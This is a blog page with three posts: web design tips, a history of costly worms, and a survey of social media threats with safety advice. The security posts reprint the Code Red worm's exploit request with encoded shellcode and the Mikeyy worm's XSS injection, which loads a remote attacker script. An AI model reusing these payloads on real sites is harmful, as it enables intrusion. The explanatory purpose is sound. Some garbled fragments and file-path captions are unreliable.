Popular Posts

Thursday, 5 January 2017

8 Web Design Facts that Will Blow Your Mind

8 Web Design Facts that Will Blow Your Mind
If you truly want to understand the web design process, you must look beyond just the outward visual appearance of a website. Very few visitors consider what happens behind the scenes of a website, as different web browsers interpret code to display that site on the screen. Extra milliseconds of loading time, browser variations, the age of the code, and the content itself can completely change a user’s experience and resulting behaviors on a website. Let’s take a look behind the curtain to learn about some of the most surprising and amazing aspects of web design.

1. All web browsers render websites differently

When you look at a website from your home computer using Google Chrome, it might be a completely different experience than your friend has when she browses the same website through Safari on her iPhone. Why does the same website look so different across various browsers? It all depends on parsing and rendering, or the way that browsers translate code and display it on your screen. Some browsers will load the code in a very specific order, and sometimes browsers won’t recognize certain code at all. For more detail on this, HTML5 Rocks has an excellent breakdown of how each browser parses code and renders it on the screen.
Browser differences can make it tricky for you to create a website that provides a great experience to everyone. That’s when professional web designers step in. They are familiar with HTML and CSS standards, known browser issues, and the ways to work around potential hurdles. It’s a web designer’s job to ensure that your website looks good and functions properly across many different browsers. They also perform extensive browser compatibility testing to identify potential issues, and establish necessary fixes for those issues, before a website goes live.

2. Design dictates where users will focus on your website

The Internet has forever changed the way we read and browse content. According to the Nielson Norman Group’s report, “How Users Read on the Web,” successful websites with a clear and scannable layout have a 47% usability improvement. If a visitor can’t skim through your website and identify key information quickly, they are likely to leave and visit another website instead.
Web designers strive to create sites that direct viewers to the most vital information, such as an online store, your company’s blog, an organization’s history, or other content important to both them and you. Web professionals can also use heat maps and analytic tools to see which buttons and links are popular so that they can continually improve the user experience with future updates on the site.

3. A two-year-old website may be too old

Web designers work hard to keep up with the breakneck pace of technology. Since the web browsers and devices being used to access websites are constantly changing, the way that those websites are designed and developed must change as well. To remain current and relevant, digital professionals must stay on top of the latest coding standards, browser compatibility updates, and search engine algorithms. An outdated website runs the risk of not displaying properly in the web browser, having unexpected formatting issues, or not showing up effectively in search engine results. For this reason, a site that is even two years old may be antiquated if it has not kept pace with these changes.

4. Templates will restrict what you can do with your website

Many people turn to website templates as an “easy way out.” Pre-packaged templates often allow anyone to create a website with little to no coding knowledge. Unfortunately, companies can lose credibility by relying too heavily on templates, which typically include bloated code and unnecessary design elements. Trying to force a template to do something new can make it look patched-together, like a Frankenstein website, and that is if that template will even allow for those needed changes. Many templates are notoriously inflexible in what they will allow for, meaning your site may be painted into a corner. Your organization can benefit the most by having a web presence that is custom-made for your needs and the needs of your customers.

5. Your website’s code helps it to appeal to search engines

You could have the most visually-stunning website in the world, but it won’t matter if you don’t have an audience to view and use that website. Web professionals make sure that the way your site is coded will help an audience to find your website when they type certain keywords into Google or another search engine. The way that the website is coded even affects how your search engine listings look, from the title of the web page in the search results to the small description of your site that appears below the title. Search engines can be a great source of new traffic your website, and there are many additional steps that can be taken on a site to fully optimize if for those search engines, but it all starts with coding best practices and ensuring that the foundation of your site in conducive to a good relationship with the search engines.

6. Images and videos can have a positive or a negative impact on your website

Multimedia content, including images and videos, can be a powerful part of a website, but if used improperly, they can also significantly damage a website’s performance. Large image and video files can dramatically slow down the loading time of your website. When visitors have to wait too long for a page to load, you risk them growing impatient with the site and abandoning it altogether. To ensure that any multimedia content that is used on a site engages visitors rather than drives them away, web designers must use images and videos that are optimized for websites. These optimized files will ensure that your page loads quickly while still offering that rich imagery or video content.
Web professionals also avoid outdated multimedia formats, such as Flash, which aren’t supported by many of today’s mobile device platforms. Instead, they favor current standards, like HTML5 video, so that people can access your media from the widest range of devices possible, including computers, tablets, and smartphones.

7. A good website design ranges between $500 – $5000

A pricing infographic by Incion reveals that a good website design can cost between Rs.  to $5,000. If you’re surprised at this range, consider the number of hours and collective brainpower that goes into optimizing websites for search engines, making content accessible across browsers, and improving overall performance by speeding up your website’s loading times. Designers often rely on specialty software and robust tools to ensure that a website’s code functions the way its intended while displaying well.

8. There’s a big difference between responsive and mobile web design

Most people don’t think about the seemingly magical website conversion that happens when they switch between their smartphone and computer. These are two very different approaches to shifting screen sizes, either mobile design or responsive design.

Mobile design is restrictive. It serves up a separate, and often limited, version of your website that can be used on smartphones and tablets. However, because mobile websites generally provide visitors with the bare basics that the site has to offer, they won’t get to see the full glory of your web design or use it to its full potential.

Responsive design is extremely flexible, allowing websites to resize and reflow their layout based on the visitor’s screen size. This gives visitors a consistent experience from large-screen, high-resolution monitors all the way to the smallest smartphone touchscreens, while also having an experience that is suited to each of those individual devices. Responsive websites will simply adapt to their environment, while maintaining the same stunning images, typefaces, and navigational options.

The complexities of web design are indeed mind-blowing, requiring a high level of updated awareness and attention to detail to create the best website possible. Keep these facts in mind as you move forward with your own web presence!


Wednesday, 4 January 2017

Most Expensive Computer Viruses of All Time

Most Expensive Computer Viruses of All Time

When talking about the most expensive computer viruses of all times its important to understand that from time to time the cyberspace experiences different security challenges. One of the foremost challenge has been the computer virus. If you scan through the World Wide Web, you would come to know about thousands of different computer viruses. However, from such a huge list only few have been successful in affecting computer systems and networks globally. Only few have succeeded in causing damages worth billions of dollars. This article presents the list of 5 most expensive computer viruses of all time.
  1. MyDoom- over $38.5 billion in damages

C:\Documents and Settings\Sudip\Desktop\virus\most-expensive-computer-virus-heimdal-security.png
Mydoom is primarily transmitted via e-mail, appearing as a transmission error, with subject lines including "Error", "Mail Delivery System", "Test" or "Mail Transaction Failed" in different languages, including English and French. The mail contains an attachment that, if executed, resends the worm to e-mail addresses found in local files such as a user's address book. It also copies itself to the “shared folder” of peer-to-peer file-sharing application KaZaA in an attempt to spread that way.
Mydoom avoids targeting e-mail addresses at certain universities, such as Rutgers, MIT, Stanford and UC Berkeley, as well as certain companies such as Microsoft and Symantec. Some early reports claimed the worm avoids all .edu addresses, but this is not the case.
The original version, Mydoom.A, is described as carrying two payloads:
  • A backdoor on port 3127/tcp to allow remote control of the subverted PC (by putting its own SHIMGAPI.DLL file in the system32 directory and launching it as a child process of the Windows Explorer); this is essentially the same backdoor used by Mimail.
  • A denial-of-service attack against the website of the controversial company SCO Group, timed to commence 1 February 2004. Many virus analysts doubted if this payload would actually function. Later testing suggests that it functions in only 25% of infected systems.
A second version, Mydoom.B, as well as carrying the original payloads, also targets the Microsoft website and blocks access to Microsoft sites and popular online antivirus sites by modifying the hosts file, thus blocking virus removal tools or updates to antivirus software. The smaller number of copies of this version in circulation meant that Microsoft's servers suffered few ill effects
Image result for mydoom virus effect
  1. SoBig - $37 Billion in damages

sobig
The Sobig Worm was a computer worm that infected millions of Internet-connected, Microsoft Windows computers in August 2003.
Although there were indications that tests of the worm were carried out as early as August 2002, Sobig.A was first found in the wild in January 2003. Sobig.B was released on May 18, 2003. It was first called Palyh, but was later renamed to Sobig.B after anti-virus experts discovered it was a new generation of Sobig. Sobig.C was released May 31 and fixed the timing bug in Sobig.B. Sobig.D came a couple of weeks later followed by Sobig.E on June 25. On August 19, Sobig.F became known and set a record in sheer volume of e-mails.
The worm was most widespread in its "Sobig.F" variant.
Sobig is not only a computer worm in the sense that it replicates by itself, but also a Trojan horse in that it masquerades as something other than malware. The Sobig.F worm will appear as an electronic mail with one of the following subjects:
  • Re: Approved
  • Re: Details
  • Re: Re: My details
  • Re: Thank you!
  • Re: That movie
  • Re: Wicked screensaver
  • Re: Your application
  • Thank you!
  • Your details
It will contain the text: "See the attached file for details" or "Please see the attached file for details." It also contains an attachment by one of the following names:
  • application.pif
  • details.pif
  • document_9446.pif
  • document_all.pif
  • movie0045.pif
  • thank_you.pif
  • your_details.pif
  • your_document.pif
  • wicked_scr.scr
  1. ILOVEYOU - $15 Billion in damages

most expensive computer viruses
ILOVEYOU, sometimes referred to as Love Letter, was a computer worm that attacked tens of millions of Windows personal computers on and after 5 May 2000[1] local time in the Philippines
Common name
Love Letter
Type
Computer worm
Point of origin
Operating system(s) affected
Written in


when it started spreading as an email message with the subject line "ILOVEYOU" and the attachment "LOVE-LETTER-FOR-YOU.txt.vbs". The latter file extension (in this case, 'VBS' - a type of interpreted file) was most often hidden by default on Windows computers of the time, leading unwitting users to think it was a normal text file. Opening the attachment activated the Visual Basic script. The worm did damage on the local machine, overwriting random types of files (including Office files, image files, and audio files; however after overwriting MP3 files the virus would hide the file), and sent a copy of itself to all addresses in the Windows Address Book used by Microsoft Outlook. In contrast, the Melissa virus only sent copies to the first 50 contacts.

4. Conficker - $9.1 Billion in damages

most expensive computer viruses
Conficker, also known as Downup, Downadup and Kido, is a computer worm targeting the Microsoft Windows operating system that was first detected in November 2008.It uses flaws in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet, and has been unusually difficult to counter because of its combined use of many advanced malware techniques. The Conficker worm infected millions of computers including government, business and home computers in over 190 countries, making it the largest known computer worm infection since the 2003 Welchia
Aliases
  • Mal/Conficker-A (Sophos)
  • Win32/Conficker.A (ESET)
  • Win32/Conficker.A (CA)
  • W32.Downadup (Symantec)
  • W32/Downadup.A (F-Secure)
  • Conficker.A (Panda)
  • Net-Worm.Win32.Kido.bt (Kaspersky)
  • W32/Conficker.worm (McAfee)
  • Win32.Worm.Downadup.Gen (BitDefender)
  • Win32:Confi (avast!)
  • WORM_DOWNAD (Trend Micro)
  • Worm.Downadup (ClamAV)
Classification
Unknown
Type
Computer virus
Subtype
Computer worm

5. Code Red - $2 Billion

Code Red was a computer worm observed on the Internet on July 15, 2001. It attacked computers running Microsoft's IIS web server.
The Code Red worm was first discovered and researched by eEye Digital Security employees Marc Maiffret and Ryan Permeh, the Code Red worm exploited a vulnerability discovered by Riley Hassell. They named it "Code Red" because Code Red Mountain Dew was what they were drinking at the time.[1]
Although the worm had been released on July 13, the largest group of infected computers was seen on July 19, 2001. On this day, the number of infected hosts reached 359,000
Common name
Code Red
Technical name
CRv and CRvII
Type
Server Jamming Worm
Isolation
July 15, 2001

The payload of the worm included:
  • defacing the affected web site to display:
HELLO! Welcome to http://www.worm.com! Hacked By Chinese!
  • Other activities based on day of the month:
    • Days 1-19: Trying to spread itself by looking for more IIS servers on the Internet.
    • Days 20–27: Launch denial of service attacks on several fixed IP addresses. The IP address of the White House web server was among those.
    • Days 28-end of month: Sleeps, no active attacks.
When scanning for vulnerable machines, the worm did not test to see if the server running on a remote machine was running a vulnerable version of IIS, or even to see if it was running IIS at all. Apache access logs from this time frequently had entries such as these:
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNN
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0
The worm's payload is the string following the last 'N'. Due to a buffer overflow, a vulnerable host interprets this string as computer instructions, propagating the worm.
About the Author : Indranath Mitra (Partner, Star Softwares) I discussed about the Most Expensive Computer Viruses of All Time. Now that you have a better understanding of these risks, what options do you have to better protect your PC against them?

Tuesday, 3 January 2017

Social Media- A Hacker's Favorite Target.

Social Media- A Hacker's Favorite Target.

Abstract
Social networks are an inherent part of today’s Internet and used by more than a billion people worldwide These sites expose the kids to Various risks like online bullying, disclosure of personal information, cyber-stalking, access to inappropriate content, child abuse, etc. In addition, there are many more risk like fake profiles with false information, malicious application, spam, and fake links which lead to phishing attacks etc.

C:\Documents and Settings\Sudip\Desktop\social\Going-Global-Strategies-for-Launching-an-International-Social-Media-Campaign-1024x6512.png

  1. Spamming in social networks
Spam is usually unwanted e-mail advertising about a product sent to list of e-mails or group of e-mail addresses. Spammers send the unwanted mails of messages to the billions of users of social networking sites which are free; and are easily accessible to gather the personal information of the unsuspecting users.

Twitter has drastically improved their internal spam detection and filtering in 2010, bringing the spam message portion down to 1%, from 10% in 2009. With 65 million tweets per day that still means 650,000 are spam, but it is much better than the 90% spam rate that we currently encounter with email.

Trojan.Bredolab spoofed email
C:\Documents and Settings\Sudip\Desktop\social\facebook_spoof1.jpg

In addition to the spam inside the social networks, the brand reputations of social networks are often misused in order to boost the credibility of bulk mails sent outside of the social network. For example, spoofed emails claiming to come from the support center, notifying users about new friend requests or password resets, have made their way through the Internet. Since people are used to receiving contact requests from forgotten friends they often do not fully inspect the message, instead clicking the link in the notification email. Some contain links to malicious websites, others use the old, but still working, approach of attaching a malicious attachment with a Trojan,

Spam mail spoofing Facebook message

2. Social engineering threats

  1. Placing baits in social networks

Many Search Engine Optimization (SEO) image poisoning has recently been pushed again. The idea is simple, utilize keywords and links in such a way that the sites are ranked very high and appear in the first search results. Similar attacks can also happen in social networks

Tweets with links to malware

  1. Follower scams

Some websites offer free services where you have to hand over your account name and password and they will in turn ensure that you acquire many new followers per day. Obviously it is a bad idea to share your password with strangers, since you cannot control what will be done with your account. In most cases it is also against the terms and conditions of the social network.

Twitter followers advertisement

  1. Impersonation of celebrities

A few fake profiles of celebrities that have been created on various social networks. Unfortunately there is little stopping someone from registering a new account under the name of a celebrity and using a publicly available photo as a profile picture.

Fake David Beckham profile with spam messages


The Verified Twitter account of Bill Gates


  1. Impersonation of friends

Phishing attacks and local information-stealing Trojans are currently the most common causes. Once an attacker obtains the password of an account he can start to send out messages or update the profile status. These update messages often include links to other malicious sites in order to get more account passwords. As the message seems to come from a friend’s account people tend to trust it. This inherent trust, and the usual curiosity, leads to a high click rate on those malicious links, making the attacks very successful. Users should be aware that even messages coming from confirmed friends might have been auto-generated by malware. Therefore do not blindly click on links in messages and be vigilant, especially when asked to log in or download further content, such as video players.

C:\Documents and Settings\Sudip\Desktop\social\lisa-larter-stop-impersonator-31.jpg


  1. Koobface

Koobface worm has been one of the first large malware attacks, targeting social networks for years, and it is still wide-spread and active today. It is very successful as it uses clever social engineering attacks and counts on the link-opening behavior of social media users. The current variants send direct messages from infected users to all their friends in Facebook and other networks, but it is also capable of updating status messages or adding text to profile pages.

Fake YouTube site created by W32.Koobface


  1. Phishing

Phishing attack is creation of fake site just similar to original site. These days even social networking phishing has come in different flavors just like phishing attack on banks and popular trading websites. Social networking phishing has come up with fake mail sand messages like offering some specialized themes, updating the profile, updating the security application/features etc.

Orkut phishing site using a Brazil carnival theme


  1. Advanced fee scams

Since people willingly disclose a lot of private information, a scammer can easy identify possible victims that will fall for the scam and adjust the motives that the chosen social engineering trick will exploit. These types of scams typically come with a nice matching story that will present the victim some enormous benefit with apparently no strings attached. Later the scammer will inform the user about some unforeseen problem and will need a small amount to be paid up front. After the money is paid the attacker disappears, along with the promised benefits.
C:\Documents and Settings\Sudip\Desktop\social\facebook-awards-2016-advance-fee-scam-1.jpg
3. Applications & widgets in social networks

Some social networks allow active content to be embedded in the form of applications or widgets. These applications can then interact with the user and his group of friends. Unfortunately, that sometimes allows them to covertly access some information or even attack users or other applications. The following sections show some examples of attacks that we observed.

Example 1 – Never Text Again

In July 2010 around 300,000 people fell for a shady application in Facebook. Suddenly more and more personal profiles started showing a message with the following text:

I am shocked!!! I’m NEVER texting AGAIN since I found this out. Video here: http://bit.ly/[REMOVED] - Worldwide scandal!

Malicious Facebook application install page

Facebook application permission dialog

Automatically posted Facebook message by malicious app
Fake security check notification from a malicious application
Application settings removal confirmation page

Example 2 – Candid Camera Prank

Social engineering message and picture posted by malware

Your FLV Player seems to be out of date. Please update your FLV Player in order to proceed. Please click the Continue button now and wait a few seconds.



What applications can do

As an example, Facebook has two basic application types. First, there are social plug-ins, which allow the integration of basic Facebook features onto any website. Canvas applications, which do interact with the profile, can send update messages or open a new page, which in turn can contain nearly anything.
The “Like” button that allows people to inform others about the existence of a page is an example of a social plug-in. The other applications can, to some extent, load code from remote websites and execute it.
Permission request page of test application, designed by author


Here is a selected list of some of the things an application can get permission for:
Access the public information —This includes the user’s name, profile picture, list of friends, and all other public parts of the profile.
Access the profile information —This includes any additional information, such as birthday, favorite movies and books, etc.
Send email —This means sending direct emails to the registered email address.
Access posts in the News feed —This allows the application to read the posted messages.
Access family and relationships information
Access photos and videos
Access friends’ information —This includes their details, birthdays, etc.
Access the data at any time—This means the application can access the data even if the user is logged out and not using the application at that moment.
Post to the wall —Add new message posts on the user’s behalf

Default friends application access permissions


4. Content threats

Infected profile sites- Sometimes someone finds a bug in the implementation, or a case that was not considered, that still allows the uploading of malicious content. One of the most dangerous cases is if it is possible to include arbitrary remote content. This allows an attacker, among other things, to embed web-attacking toolkits inside profile sites, generating a massive drive-by download attack against everyone viewing the infected profile.
Malicious links- Since users control the content of their own profile they can add malicious content to the pages. One of the most obvious attacks is to redirect the user to an external malicious site which is fully controlled by the attacker. The posts can be made deliberately on specially registered dummy accounts or unwillingly by script attacks.
URL shortening services- URL shortening services have been around for years. Today it is usually a short domain name combined with an injective function key lookup redirection system. This allows a user to create a short URL out of any given long link.

For example, if you receive the following Bit.ly short URL: http://bit.ly/XuX9i you can append a plus sign at the end of the URL, which will then open a preview page when visited that explains more about the target page. In this case this would be: http://bit.ly/XuX9i+


5. Script threats

  1. Manual script attacks

One of the simplest attack classes that we have seen on social media are the manual script attacks. Manual because the victim is asked to copy and execute the script manually.

If a user clicks the link he or she will be asked to follow a few simple instructions. In this case the instructions are:

  1. Click the Like button (This will generate an entry on the user’s profile site.)
  2. Press CTRL+C
  3. Press ALT+D
  4. Press CTRL+V
  5. Press ENTER

Manual script attack first step instruction

Following the instructions step-by-step will copy hidden JavaScript, focus on the users URL bar, paste the JavaScript, and then execute it. By doing so, the script is able to use the current logged in session to send messages to all the user’s friends, asking them to repeat the cycle.

Manual script attack instructions
 

  1. Cross-site scripting (XSS)

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.

In April 2009, Twitter was hit by a couple of XSS worms. One of these, later dubbed Mikeyy, did not cause any direct damage or download other malware, but it definitely kept a lot of people busy and is a good example of the potential of such attacks. What had happened was that someone found a XSS vulnerability in one of the attributes in the cascading style sheets (CSS) of the Twitter profile sites. The user was allowed to modify some of the color values of the profile’s CSS. Unfortunately a malicious user could send unexpected characters for the color value, resulting in custom code being executed by the browser. Instead of a simple style tag, as shown below, the attacker was able to submit a closing tag for the style element followed by a script element that pointed to his remote malicious script.


Normal tag:
<style type=”text/css”> a { color: #0000ff; } </style>

Modified tag with embedded script code:
<style type=”text/css”> a { color: #
</style>mikeyy:) “></a><script src=http://mikeyylolz[REMOVED].com/x.js> </script>

Using this hole it was possible to load a small bit of JavaScript code that would execute whenever someone would view an infected profile.


  1. Cross-site request forgery (CSRF)

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.
C:\Documents and Settings\Sudip\Desktop\social\NVD-CVE-2007-1332.png

  1. Clickjacking

Generally, clickjacking is malicious technique of tricking Web users into revealing confidential information or taking control of their computer while clicking on seemingly i|1nocroos Web pages. A clickjacking takes the form of embedded code or script that can run without the user's knowledge.

Clickjacking example with two layers
 

6. Design issues

A. Privacy

Most social networks allow a user to set different privacy settings for confirmed friends in contrast to public strangers. In some cases, a user can decided to share his private email address with all his connected friends but keep it invisible for someone just browsing his public profile. For example, Facebook distinguishes three groups of visitors: direct “friends”, the “friends of friends”, or “everyone”. For a list of different information pieces the user can decide how far he wants to share that information. The default sharing setting, “everyone”, is pretty liberal and shares a lot of information. Many users might not be aware of this and would probably like to adjust their privacy settings.

Facebook privacy settings
B.  Information disclosure

It is clear that since one of the main purposes of a social community is to share information, some information will be disclosed to others.

  1. Revealing location data- People like to socialize and share what’s on their mind. This includes, by nature, information that might be misused. One of the attributes that is often overlooked is the location data that is passed along. Many people are broadcasting information about exactly where they are, which is not an issues per-se, but this information can obviously also be misused for stalking or other shenanigans.
  2. Revealing identity- In some groups, social networks can be directly linked to Internet users on other platforms and since they provide a real name, also identify a user behind an anonymous action.

C. Insecure frameworks

Since social network platforms are getting more and more complex it is not astonishing that from time to time some vulnerabilities in their frameworks are discovered. The severity ranges from accessing private information of other users to modifying other user’s accounts.

D.  Misuse as control structure

Given the well-distributed architecture of social networks, their good Internet connections make them a primary candidate for botnet control.

  1. Botnet control over status messages- There have been attempts to misuse social networks as a command and control structure for botnets. This does not come as a surprise, especially after several ISPs have been shut down in order to eradicate botnets. The botnet creators have been searching for more robust means of controlling their assets. Trojan.Whitewell is one such bot, periodically checking the mobile version of a predefined Facebook account. The attacker can submit a new post to the profile in order to have the bot download and run a file from an URL or contact a web server to get new commands.

Bot Twitter account with encoded commands
 

  1. Information sharing- Besides using social networking profiles as command structures, they can also be used for storing updates or dropping off information. Just think of a Trojan that downloads a binary update from a predefined profile. To make it harder to trace, the updates could be embedded in a media file, such as a picture. The updated Trojan could then send its gathered data as encrypted text updates, such as local passwords, back to another profile. If the information is obfuscated enough it could blend into the normal expected traffic and be accessed from anywhere.


Best practice tips

1. Be skeptical
Social networks can be a useful source for business information, as well as for newsworthy updates from your friends. But they also contain a lot of useless information. Generally speaking, you should treat anything you see online with a high degree of skepticism. Do not believe everything you read, be it financial advice, breaking news, or tips on free giveaways—especially if it involves clicking a link or installing an application. If someone asks you for money in advance, it might be a scam.

2. Check privacy policies & settings
All major social networking services have specific privacy guidelines and rules that are published on their websites. Make sure you understand them, even though they may be tedious to read, as they likely explain if your information is shared with other parties. Some services offer the ability to restrict your privacy settings for specific groups, such as allowing you to share pictures with your friends only and not everyone. Make good use of these settings.


3. Good passwords
Use good, strong passwords. (Your birth date or “123456” are not good passwords.) If possible, the password should contain letters and numbers, as well as special characters. If you can’t remember complex passwords, either use a passphrase as hint or use any of the available password management utilities that can securely store them for you. Do not choose a password that can be guessed by the information that you have published on your account site. This includes friend’s names, favored movie stars, or pet names.

4. Protect the password
You should never share your password with others. This includes services that promise to help you get more friends or something similar. Do not lose control of your password. If you enter your password, ensure that you are on the real website and not a phishing scam page that just looks like the original site. Should you suspect that you have fallen for a phishing attack and your account has been compromised, use a clean computer to log into the original service and change your password.

5. Be thoughtful
Always think twice before posting something. Keep in mind that once you posted it, even to a close group of friends, you no longer have control over where it will be reposted and who might read it. These things can come back to haunt you when you search for a new position in the future. Consider if you really need to publish the full information. This includes posting too many personal details, such as phone numbers or work-related things. Furthermore refrain from forwarding virus hoax or exaggerated warning messages that will confuse more than help other users. Be nice and respectful to others—do not post hate messages about others, since you would not want to receive them yourself.

6. Be wary
People on the Internet are not always who they claim to be. The celebrity who you are following might just be another fan, and the supposed co-worker from another office might just be someone doing reconnaissance on your enterprise. Not everyone that claims to be your friend is your friend.

7. Stay updated
Always ensure that the software you use is up-to-date. Not only does this include the operating system and web browser, but also third-party plug-ins, such as PDF viewers. Install all the latest patches and hot fixes from the official site and automatically check for newer available versions through the software.


8. Stay protected
Some of the newer attacks are very sophisticated and are sometimes hard to spot for an untrained eye. Use comprehensive security software to protect against these threats.


Conclusion

Social networks definitely can be fun, but users should be aware of the risks and behave with the needed level of skepticism, just like anywhere else.


References
http://www.symantec.com/connect/blogs/social-media-can-t-live-it-can-t-live-without-it1.
http://www.facebook.com2.
http://myspace.com3.
http://www.mixi.jp4.
http://www.orkut.com/5.
http://blog.twitter.com/2010/02/measuring-tweets.html6.
http://blog.twitter.com/2010/03/state-of-twitter-spam.html7.
http://www.zdnet.com/blog/security/cybercriminals-hijack-twitter-trending-topics-to-serve-8. malware/3549
http://gizmodo.com/5535536/the-real-story-behind-twitters-ridiculous-follow-bug9.
http://techcrunch.com/2009/01/05/either-fox-news-had-their-twitter-account-hacked-or-bill-oreilly-is-10. gay-or-both/
http://www.symantec.com/security_response/writeup.jsp?docid=2008-080315-0217-9911.
http://www.symantec.com/en/uk/security_response/writeup.jsp?docid=2009-082405-1354-99&tabid=212.
http://www.symantec.com/connect/de/blogs/phishing-facebook-continues13.
http://www.symantec.com/business/theme.jsp?themeid=threatreport14.
http://www.symantec.com/connect/de/blogs/twitter-used-bait-phish-personal-information15.
http://www.symantec.com/connect/de/blogs/hey-mr-dj-don-t-put-record16.
http://developers.facebook.com/docs/authentication/permissions17.
http://developers.facebook.com/blog/post/38618.
http://theharmonyguy.com/2009/10/09/the-month-of-facebook-bugs-report/19.
http://theharmonyguy.com/2010/04/10/facebook-platform-vulnerability-enabled-silent-data-harvesting/20.
http://developers.facebook.com/plugins21.
http://apps.facebook.com/nortonsafeweb/22.
http://namb.la/popular/tech.html23.
http://www.symantec.com/connect/de/blogs/clickjack-baddie-whack24.
http://developers.facebook.com/docs/reference/plugins/like25.
http://seclab.stanford.edu/websec/framebusting/framebust.pdf26.
http://blog.facebook.com/blog.php?post=39192232713027.
https://ssl.facebook.com/help/contact.php?show_form=delete_account28.
http://www.wired.com/threatlevel/2010/06/foursquare-privacy/29.
http://www.iseclab.org/papers/raid2010.pdf30.
http://eu.techcrunch.com/2010/05/05/video-major-facebook-security-hole-lets-you-view-your-friends-31. live-chats
http://www.coresec.de/lenaml/lenaml.pdf32.
http://www.heise.de/security/meldung/SchuelerVZ-Datenlecks-auch-geschuetzte-Informationen-33. ausgespaeht-843963.html
http://techcrunch.com/2010/03/01/facebook-code-testing-bug/34.
http://www.wired.com/epicenter/2009/08/twitter-apparently-down/35.
http://www.symantec.com/connect/de/blogs/trojanwhitewell-what-s-your-bot-facebook-status-today36.
http://www.messagelabs.com/intelligence.aspx37.

About the Author : Indranath Mitra (Partner, Star Softwares) I discussed the importance of opening your eyes to the specific risks that the use of social media can present to your organization. Now that you have a better understanding of these risks, what options do you have to better protect your organization against them?
Early detection is imperative for mitigating social media risks. With the help of intelligence services you can improve your organization’s situational awareness to identify and even anticipate certain challenges in order to strengthen your defenses.

Contact Form

Name

Email *

Message *